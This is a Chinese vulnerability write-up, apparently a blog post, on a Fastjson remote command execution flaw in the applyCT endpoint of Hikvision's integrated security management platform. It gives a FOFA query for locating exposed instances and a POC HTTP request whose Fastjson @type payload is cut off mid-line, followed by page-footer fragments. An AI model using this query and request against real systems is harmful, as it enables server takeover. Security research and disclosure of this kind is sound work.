本文介绍了海康威视综合安防管理平台存在的Fastjson命令执行漏洞,该漏洞允许攻击者通过低版本Fastjson执行任意命令获取服务器权限。详细描述了漏洞的情况,并提供了产品主页信息及漏洞复现的POC,最后建议联系厂商进行修复。
Nx01 产品简介
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
Nx02 漏洞描述
Hikvision综合安防管理平台applyCT存在低版本Fastjson远程命令执行漏洞,攻击者通过漏洞可以执行任意命令获取服务器权限。
Nx03 产品主页
fofa-query: body="/portal/skin/isee/redblack/"
Nx04 漏洞复现
POC:
POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: {
{Hostname}}
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 194
{"a":{"@type":"java.lang.Class","
已下架不支持订阅
1878
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
